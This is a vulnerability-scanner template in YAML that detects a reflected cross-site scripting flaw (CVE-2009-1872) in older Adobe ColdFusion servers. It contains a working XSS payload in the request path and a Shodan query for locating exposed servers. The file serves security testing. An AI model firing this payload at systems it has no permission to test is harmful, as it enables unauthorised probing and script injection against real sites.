43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
id: CVE-2009-1872
|
|
|
|
info:
|
|
name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
|
|
author: princechaddha
|
|
severity: medium
|
|
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
|
|
reference:
|
|
- https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
|
|
- https://www.tenable.com/cve/CVE-2009-1872
|
|
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
|
|
- http://www.dsecrg.com/pages/vul/show.php?id=122
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
|
|
classification:
|
|
cve-id: CVE-2009-1872
|
|
metadata:
|
|
shodan-query: http.component:"Adobe ColdFusion"
|
|
verified: "true"
|
|
tags: cve,cve2009,adobe,xss,coldfusion,tenable
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
part: body
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/08/12
|